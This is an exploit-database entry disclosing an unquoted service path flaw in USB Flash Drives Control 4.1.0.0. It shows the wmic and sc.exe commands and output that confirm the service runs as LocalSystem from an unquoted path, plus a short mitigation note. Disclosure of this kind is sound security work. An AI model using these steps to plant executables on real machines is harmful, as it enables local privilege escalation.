header-logo
Suggest Exploit
vendor:
USB Flash Drives Control
by:
Jeffrey Bencteux
7.5
CVSS
HIGH
Unquoted Service Path
428
CWE
Product Name: USB Flash Drives Control
Affected Version From: 4.1.0.0
Affected Version To: 4.1.0.0
Patch Exists: NO
Related CWE:
CPE: a:binisoft:usb_flash_drives_control:4.1.0.0
Metasploit:
Other Scripts:
Platforms Tested: Microsoft Windows 11 Pro
2023

USB Flash Drives Control 4.1.0.0 – Unquoted Service Path

The USB Flash Drives Control software version 4.1.0.0 is vulnerable to an unquoted service path vulnerability. This allows an attacker to gain elevated privileges by placing a malicious executable in a directory with spaces in its name.

Mitigation:

To mitigate this vulnerability, the vendor should update the software to use quoted paths for the service binary. Users should also ensure that their system is up-to-date with the latest security patches.
Source

Exploit-DB raw data:

# Exploit Title: USB Flash Drives Control 4.1.0.0 - Unquoted Service Path
# Date: 2023-31-05
# Exploit Author: Jeffrey Bencteux
# Vendor Homepage: https://binisoft.org/
# Software Link: https://binisoft.org/wfc
# Version: 4.1.0.0
# Tested on: Microsoft Windows 11 Pro
# Vulnerability Type: Unquoted Service Path

PS C:\> wmic service get name,displayname,pathname,startmode |findstr /i
"auto" |findstr /i /v "c:\windows"
USB Flash Drives Control       usbcs       C:\Program Files\USB Flash
Drives Control\usbcs.exe       Auto

PS C:\> sc.exe qc usbcs
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: usbcs
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\USB Flash Drives
Control\usbcs.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : USB Flash Drives Control
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

PS C:\> systeminfo
OS Name:                   Microsoft Windows 11 Pro
OS Version:                10.0.22621 N/A Build 22621
OS Manufacturer:           Microsoft Corporation

-- 
Jeffrey BENCTEUX